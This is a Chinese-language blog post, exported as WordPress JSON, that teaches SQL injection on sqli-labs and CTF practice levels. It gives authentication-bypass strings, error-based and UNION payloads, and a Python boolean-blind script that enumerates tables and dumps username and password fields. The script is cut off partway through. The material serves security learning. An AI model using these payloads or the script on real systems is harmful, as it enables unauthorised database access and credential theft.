{"id":148,"date":"2021-06-16T22:00:17","date_gmt":"2021-06-16T14:00:17","guid":{"rendered":"http:\/\/101.34.19.194\/?p=148"},"modified":"2024-02-20T21:12:24","modified_gmt":"2024-02-20T13:12:24","slug":"148","status":"publish","type":"post","link":"http:\/\/101.34.19.194\/?p=148","title":{"rendered":"SQL\u6ce8\u5165"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u5c0f\u77e5\u8bc6\u70b9<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u7cfb\u7edf\u51fd\u6570<\/h3>\n\n\n\n<p>version()\u2014\u2014MySQL \u7248\u672c user()\u2014\u2014\u6570\u636e\u5e93\u7528\u6237\u540d database()\u2014\u2014\u6570\u636e\u5e93\u540d @@datadir\u2014\u2014\u6570\u636e\u5e93\u8def\u5f84 @@version_compile_os\u2014\u2014\u64cd\u4f5c\u7cfb\u7edf\u7248\u672c<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5b57\u7b26\u4e32\u8fde\u63a5\u51fd\u6570<\/h3>\n\n\n\n<p>1.concat(str1,str2,\u2026)\u2014\u2014\u6ca1\u6709\u5206\u9694\u7b26\u5730\u8fde\u63a5\u5b57\u7b26\u4e32 2.concat_ws(separator,str1,str2,\u2026)\u2014\u2014\u542b\u6709\u5206\u9694\u7b26\u5730\u8fde\u63a5\u5b57\u7b26\u4e32 3.group_concat(str1,str2,\u2026)\u2014\u2014\u8fde\u63a5\u4e00\u4e2a\u7ec4\u7684\u6240\u6709\u5b57\u7b26\u4e32\uff0c\u5e76\u4ee5\u9017\u53f7\u5206\u9694\u6bcf\u4e00\u6761\u6570\u636e \u8bf4\u7740\u6bd4\u8f83\u62bd\u8c61\uff0c\u5176\u5b9e\u4e5f\u5e76\u4e0d\u9700\u8981\u8be6\u7ec6\u4e86\u89e3\uff0c\u77e5\u9053\u8fd9\u4e09\u4e2a\u51fd\u6570\u80fd\u4e00\u6b21\u6027\u67e5\u51fa\u6240\u6709\u4fe1\u606f\u5c31\u884c\u4e86\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6ce8\u5165\u9700\u8981\u7528\u5230\u7684\u51fd\u6570<\/h3>\n\n\n\n<p>Length() \/\/\u8fd4\u56de\u5b57\u7b26\u4e32\u7684\u957f\u5ea6 eg:Length(abc) \/\/\u8fd4\u56de3\uff0c\u8868\u793aabc\u5b57\u7b26\u4e32\u957f\u5ea6\u4e3a3<\/p>\n\n\n\n<p>Substr() \/\/\u622a\u53d6\u5b57\u7b26\u4e32 eg:substr(abc,1,1) \/\/\u8fd4\u56dea,\u4eceabc\u7684\u7b2c\u4e00\u4f4d\u5f00\u59cb\u622a\uff0c\u6b65\u957f\u4e3a1<\/p>\n\n\n\n<p>mid() 
\/\/\u53d6\u51fa\u5b57\u7b26\u4e32\u7684\u4e00\u90e8\u5206\u503c eg:mid(abc,1,1) \/\/\u8fd4\u56dea\uff0c\u4ece\u7684\u7b2c\u4e00\u4f4d\u5f00\u53d6\uff0c\u6b65\u957f\u4e3a1\uff0c\u4e0esubstr()\u7528\u6cd5\u4e00\u81f4<\/p>\n\n\n\n<p>left() \/\/\u53d6\u51fa\u5b57\u7b26\u4e32\u5de6\u8fb9\u7684\u51e0\u4e2a\u6570\u636e eg:left(abc,1) \/\/\u8fd4\u56dea left(abc,2) \/\/\u8fd4\u56deab<\/p>\n\n\n\n<p>right() \/\/\u53d6\u51fa\u53f3\u8fb9\u7684\u51e0\u4e2a\u6570\u636e eg:right(abc,1) \/\/\u8fd4\u56dec left(abc,2) \/\/\u8fd4\u56debc<\/p>\n\n\n\n<p>ord()\u4e0eascii() \/\/\u8fd4\u56de\u4e00\u4e2a\u5b57\u7b26\u7684ASCII\u7801\u503c eg:ascii(s) \/\/\u8fd4\u56de114<\/p>\n\n\n\n<p>hex() \/\/\u8fd4\u56de16\u8fdb\u5236\u6570<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4e00\u822c\u7528\u4e8e\u66ff\u6362\u7684\u8bed\u53e5<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>or 1=1\u2013+<\/p>\n\n\n\n<p> &#8216;or 1=1\u2013+<\/p>\n\n\n\n<p> &#8220;or 1=1\u2013+<\/p>\n\n\n\n<p> )or 1=1\u2013+<\/p>\n\n\n\n<p> &#8216;)or 1=1\u2013+<\/p>\n\n\n\n<p> &#8220;) or 1=1\u2013+<\/p>\n\n\n\n<p> &#8220;))or 1=1\u2013+<\/p>\n<\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\">union \u64cd\u4f5c\u7b26<\/h3>\n\n\n\n<p>UNION \u64cd\u4f5c\u7b26\u7528\u4e8e\u5408\u5e76\u4e24\u4e2a\u6216\u591a\u4e2a SELECT \u8bed\u53e5\u7684\u7ed3\u679c\u96c6\u3002\u4f46\u662fUNION \u5185\u90e8\u7684 SELECT \u8bed\u53e5\u5fc5\u987b\u62e5\u6709\u76f8\u540c\u6570\u91cf\u7684\u5217\uff0c\u5217\u4e5f\u5fc5\u987b\u62e5\u6709\u76f8\u4f3c\u7684\u6570\u636e\u7c7b\u578b\u3002\u540c\u65f6\u6bcf\u6761 SELECT \u8bed\u53e5\u4e2d\u7684 \u5217\u7684\u987a\u5e8f\u5fc5\u987b\u76f8\u540c\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5176\u4ed6<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">extractvalue(1,concat(0x7e,(select @@version),0x7e)) <br>--+ mysql \u5bf9 xml \u6570\u636e\u8fdb \u884c\u67e5\u8be2\u548c\u4fee\u6539\u7684 xpath \u51fd\u6570\uff0cxpath \u8bed\u6cd5\u9519\u8bef<br>updatexml(1,concat(0x7e,(select 
@@version),0x7e),1)<br>--+ mysql \u5bf9 xml \u6570\u636e\u8fdb\u884c \u67e5\u8be2\u548c\u4fee\u6539\u7684 xpath \u51fd\u6570\uff0cxpath \u8bed\u6cd5\u9519\u8bef<br>select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;<br>--+ mysql \u91cd\u590d\u7279\u6027\uff0c\u6b64\u5904\u91cd\u590d\u4e86 version\uff0c\u6240\u4ee5\u62a5\u9519<br>select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5b57\u7b26\u578b\u6ce8\u5165<\/h2>\n\n\n\n<p>sqli-labs \u7b2c\u4e00\u5173<\/p>\n\n\n\n<p>\u624b\u5de5\u6ce8\u5165<\/p>\n\n\n\n<ul>\n<li>\u5224\u65ad\u6ce8\u5165\u70b91&#8242; or 1=1 &#8211;+\u6b63\u5e38\u56de\u663e\u5b58\u5728\u6ce8\u5165\u70b9<\/li>\n\n\n\n<li>\u83b7\u53d6\u5b57\u6bb5\u65701 order by 1,2,3 &#8211;+\u4e00\u4e2a\u4e2a\u5c1d\u8bd5\uff0c\u76f4\u5230\u62a5\u9519\u7684\u524d\u4e00\u4e2a\u4e3a\u5b58\u5728\u5b57\u6bb5\u6570<\/li>\n\n\n\n<li>\u8054\u5408\u6ce8\u5165<\/li>\n\n\n\n<li><\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2\u8868\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2\u5217\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>-1'union select id,username,password from ctfshow_user --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2flag<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6570\u5b57\u578b\u6ce8\u5165<\/h2>\n\n\n\n<p>sqli-labs \u7b2c\u4e8c\u5173<\/p>\n\n\n\n<p>\u624b\u5de5\u6ce8\u5165<\/p>\n\n\n\n<p>\u6570\u5b57\u578b\u6ce8\u5165\u6570\u5b57\u540e\u4e0d\u8ddf\u5355\u5f15\u53f7&#8217;<\/p>\n\n\n\n<ul>\n<li>\u5224\u65ad\u6ce8\u5165\u70b91 or 1=1 &#8211;+\u6b63\u5e38\u56de\u663e\u5b58\u5728\u6ce8\u5165\u70b9<\/li>\n\n\n\n<li>\u83b7\u53d6\u5b57\u6bb5\u65701 
order by 1,2,3 &#8211;+\u4e00\u4e2a\u4e2a\u5c1d\u8bd5\uff0c\u76f4\u5230\u62a5\u9519\u7684\u524d\u4e00\u4e2a\u4e3a\u5b58\u5728\u5b57\u6bb5\u6570<\/li>\n\n\n\n<li>\u8054\u5408\u6ce8\u5165<\/li>\n<\/ul>\n\n\n\n<ul>\n<li><\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>  -1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2\u8868\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>  -1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2\u5217\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>  -1 union select id,username,password from ctfshow_user --+<\/code><\/pre>\n\n\n\n<p>\u67e5\u8be2flag<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5e03\u5c14\u76f2\u6ce8<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>\u5e03\u5c14\u578b\u76f2\u6ce8\u662f\u7531\u4e8e\u9875\u9762\u63d0\u4ea4\u6570\u636e\u5728\u4e0e\u6570\u636e\u4ea4\u4e92\u662f\u5b8c\u5168\u6ca1\u6709\u5728\u9875\u9762\u4e0a\u51fa\u73b0\u56de\u663e\u6570\u636e\uff0c\u53ea\u4f1a\u51fa\u73b0\u6570\u636e\u63d0\u4ea4\u6b63\u786e\u548c\u9519\u8bef\u4fe9\u79cd\u4e0d\u540c\u9875\u9762\uff08\u62a5\u9519\u578b\u81f3\u5c11\u8bed\u6cd5\u9519\u8bef\u4f1a\u56de\u663e\u9519\u8bef\u5728\u9875\u9762\u4e0a\uff09\u6216\u8005\u65e0\u6cd5\u4f7f\u7528\u8054\u5408\u67e5\u8be2\u3002<\/p>\n<\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\">\u811a\u672c GET\u65b9\u5f0f<\/h3>\n\n\n\n<ul>\n<li>\u5224\u65ad\u6ce8\u5165\u65b9\u5f0f\uff08\u5355\u5f15\u53f7\u6216\u53cc\u5f15\u53f7\uff09?id=1&#8242; and (length(database()))&gt;1 &#8211;+<\/li>\n\n\n\n<li>\u6839\u636e\u9875\u9762\u56de\u663e\u4fee\u6539payload\uff0c\u6839\u636e\u9875\u9762\u56de\u663e\u6539word\u4e3a&#8217;You are in&#8230;..&#8217;<\/li>\n\n\n\n<li>\u7528\u811a\u672c\u8dd1<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\"># -*- coding:utf-8 -*-<br># Author: 
mochu7<br>import requests<br>\u200b<br>\u200b<br>def ascii_str(): &nbsp;# \u751f\u6210\u5e93\u540d\u8868\u540d\u5b57\u7b26\u6240\u5728\u7684\u5b57\u7b26\u5217\u8868\u5b57\u5178<br> &nbsp; &nbsp;str_list = []<br> &nbsp; &nbsp;for i in range(33, 127): &nbsp;# \u6240\u6709\u53ef\u663e\u793a\u5b57\u7b26<br> &nbsp; &nbsp; &nbsp; &nbsp;str_list.append(chr(i))<br> &nbsp; &nbsp;# print('\u53ef\u663e\u793a\u5b57\u7b26\uff1a%s'%str_list)<br> &nbsp; &nbsp;return str_list &nbsp;# \u8fd4\u56de\u5b57\u7b26\u5217\u8868<br>\u200b<br>\u200b<br>def db_length(url, str):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u6d4b\u8bd5\u6570\u636e\u5e93\u540d\u957f\u5ea6.......\")<br> &nbsp; &nbsp;num = 1<br> &nbsp; &nbsp;while True:<br> &nbsp; &nbsp; &nbsp; &nbsp;db_payload = url + \"' and (length(database())=%d)--+\" % num<br> &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(db_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;db_length = num<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(\"[+]\u6570\u636e\u5e93\u957f\u5ea6\uff1a%d\\n\" % db_length)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;db_name(db_length) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u6d4b\u8bd5\u5e93\u540d<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;num += 1<br>\u200b<br>\u200b<br>def db_name(db_length):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u6d4b\u8bd5\u6570\u636e\u5e93\u540d.......\")<br> &nbsp; &nbsp;db_name = ''<br> &nbsp; &nbsp;str_list = ascii_str()<br> &nbsp; &nbsp;for i in range(1, db_length + 1):<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in str_list:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;db_payload = url + \"' and (ord(mid(database(),%d,1))='%s')--+\" % (i, ord(j))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(db_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;db_name += 
j<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;print(\"[+]\u6570\u636e\u5e93\u540d\uff1a%s\\n\" % db_name)<br> &nbsp; &nbsp;tb_piece(db_name) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u6d4b\u8bd5security\u6570\u636e\u5e93\u6709\u51e0\u5f20\u8868<br> &nbsp; &nbsp;return db_name<br>\u200b<br>\u200b<br>def tb_piece(db_name):<br> &nbsp; &nbsp;print(\"\u5f00\u59cb\u6d4b\u8bd5%s\u6570\u636e\u5e93\u6709\u51e0\u5f20\u8868........\" % db_name)<br> &nbsp; &nbsp;for i in range(100): &nbsp;# \u731c\u89e3\u5e93\u4e2d\u6709\u591a\u5c11\u5f20\u8868\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp;tb_payload = url + \"' and %d=(select count(table_name) from information_schema.tables where table_schema='%s')--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp;i, db_name)<br> &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(tb_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_piece = i<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;print(\"[+]%s\u5e93\u4e00\u5171\u6709%d\u5f20\u8868\\n\" % (db_name, tb_piece))<br> &nbsp; &nbsp;tb_name(db_name, tb_piece) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u731c\u89e3\u8868\u540d<br>\u200b<br>\u200b<br>def tb_name(db_name, tb_piece):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u731c\u89e3\u8868\u540d.......\")<br> &nbsp; &nbsp;table_list = []<br> &nbsp; &nbsp;for i in range(tb_piece):<br> &nbsp; &nbsp; &nbsp; &nbsp;str_list = ascii_str()<br> &nbsp; &nbsp; &nbsp; &nbsp;tb_length = 0<br> &nbsp; &nbsp; &nbsp; &nbsp;tb_name = ''<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in range(1, 20): &nbsp;# \u8868\u540d\u957f\u5ea6\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_payload = url + \"' and (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i, j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
&nbsp;r = requests.get(tb_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_length = j<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(\"\u7b2c%d\u5f20\u8868\u540d\u957f\u5ea6\uff1a%s\" % (i + 1, tb_length))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for k in range(1, tb_length + 1): &nbsp;# \u6839\u636e\u8868\u540d\u957f\u5ea6\u8fdb\u884c\u622a\u53d6\u5bf9\u6bd4<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for l in str_list:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_payload = url + \"' and (select ord(mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)))=%d--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i, k, ord(l))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(tb_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tb_name += l<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(\"[+]\uff1a%s\" % tb_name)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;table_list.append(tb_name)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;print(\"\\n[+]%s\u5e93\u4e0b\u7684%s\u5f20\u8868\uff1a%s\\n\" % (db_name, tb_piece, table_list))<br> &nbsp; &nbsp;column_num(table_list, db_name) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u731c\u89e3\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u6570<br>\u200b<br>\u200b<br>def column_num(table_list, db_name):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u731c\u89e3\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u6570\uff1a.......\")<br> &nbsp; &nbsp;column_num_list = []<br> &nbsp; &nbsp;for i in 
table_list:<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in range(30): &nbsp;# \u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u6570\u91cf\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_payload = url + \"' and %d=(select count(column_name) from information_schema.columns where table_name='%s')--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;j, i)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(column_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_num = j<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_num_list.append(column_num) &nbsp;# \u628a\u6240\u6709\u8868\u7684\u5b57\u6bb5\uff0c\u4f9d\u6b21\u653e\u5165\u8fd9\u4e2a\u5217\u8868\u5f53\u4e2d<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print(\"[+]%s\u8868\\t%s\u4e2a\u5b57\u6bb5\" % (i, column_num))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;print(\"\\n[+]\u8868\u5bf9\u5e94\u7684\u5b57\u6bb5\u6570\uff1a%s\\n\" % column_num_list)<br> &nbsp; &nbsp;column_name(table_list, column_num_list, db_name) &nbsp;# \u8fdb\u884c\u4e0b\u4e00\u6b65\uff0c\u731c\u89e3\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u540d<br>\u200b<br>\u200b<br>def column_name(table_list, column_num_list, db_name):<br> &nbsp; &nbsp;print(\"[-]\u5f00\u59cb\u731c\u89e3\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u540d.......\")<br> &nbsp; &nbsp;column_length = []<br> &nbsp; &nbsp;str_list = ascii_str()<br> &nbsp; &nbsp;column_name_list = []<br> &nbsp; &nbsp;for t in range(len(table_list)): &nbsp;# t\u5728\u8fd9\u91cc\u4ee3\u8868\u6bcf\u5f20\u8868\u7684\u5217\u8868\u7d22\u5f15\u4f4d\u7f6e<br> &nbsp; &nbsp; &nbsp; &nbsp;print(\"\\n[+]%s\u8868\u7684\u5b57\u6bb5\uff1a\" % table_list[t])<br> &nbsp; &nbsp; &nbsp; &nbsp;for i in range(column_num_list[t]): &nbsp;# i\u8868\u793a\u6bcf\u5f20\u8868\u7684\u5b57\u6bb5\u6570\u91cf<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
&nbsp;column_name = ''<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for j in range(1, 21): &nbsp;# j\u8868\u793a\u6bcf\u4e2a\u5b57\u6bb5\u7684\u957f\u5ea6<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_name_length = url + \"' and %d=(select length(column_name) from information_schema.columns where table_name='%s' limit %d,1)--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;j - 1, table_list[t], i)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(column_name_length)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_length.append(j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for k in str_list: &nbsp;# k\u8868\u793a\u6211\u4eec\u731c\u89e3\u7684\u5b57\u7b26\u5b57\u5178<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_payload = url + \"' and ord(mid((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))=%d--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;table_list[t], i, j, ord(k))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(column_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_name += k<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;print('[+]\uff1a%s' % column_name)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;column_name_list.append(column_name)<br> &nbsp; &nbsp;# print(column_name_list)#\u8f93\u51fa\u6240\u6709\u8868\u4e2d\u7684\u5b57\u6bb5\u540d\u5230\u4e00\u4e2a\u5217\u8868\u4e2d<br> &nbsp; &nbsp;dump_data(table_list, column_name_list, db_name) &nbsp;# 
\u8fdb\u884c\u6700\u540e\u4e00\u6b65\uff0c\u8f93\u51fa\u6307\u5b9a\u5b57\u6bb5\u7684\u6570\u636e<br>\u200b<br>\u200b<br>def dump_data(table_list, column_name_list, db_name):<br> &nbsp; &nbsp;print(\"\\n[-]\u5bf9%s\u8868\u7684%s\u5b57\u6bb5\u8fdb\u884c\u7206\u7834.......\\n\" % (table_list[3], column_name_list[9:12]))<br> &nbsp; &nbsp;str_list = ascii_str()<br> &nbsp; &nbsp;for i in column_name_list[9:12]: &nbsp;# id,username,password\u5b57\u6bb5<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in range(101): &nbsp;# j\u8868\u793a\u6709\u591a\u5c11\u6761\u6570\u636e\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_num_payload = url + \"' and (select count(%s) from %s.%s)=%d--+\" % (i, db_name, table_list[3], j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(data_num_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_num = j<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp;print(\"\\n[+]%s\u8868\u4e2d\u7684%s\u5b57\u6bb5\u6709\u4ee5\u4e0b%s\u6761\u6570\u636e\uff1a\" % (table_list[3], i, data_num))<br> &nbsp; &nbsp; &nbsp; &nbsp;for k in range(data_num):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_len = 0<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;dump_data = ''<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for l in range(1, 21): &nbsp;# l\u8868\u793a\u6bcf\u6761\u6570\u636e\u7684\u957f\u5ea6\uff0c\u5408\u7406\u8303\u56f4\u5373\u53ef<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_len_payload = url + \"' and ascii(substr((select %s from %s.%s limit %d,1),%d,1))--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i, db_name, table_list[3], k, l)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(data_len_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str not in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_len = l - 1<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for x in range(1, data_len + 1): &nbsp;# x\u8868\u793a\u6bcf\u6761\u6570\u636e\u7684\u5b9e\u9645\u8303\u56f4\uff0c\u4f5c\u4e3amid\u622a\u53d6\u7684\u8303\u56f4<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for y in str_list:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data_payload = url + \"' and ord(mid((select %s from %s.%s limit %d,1),%d,1))=%d--+\" % (<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;i, db_name, table_list[3], k, x, ord(y))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(data_payload)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if str in r.text:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;dump_data += y<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 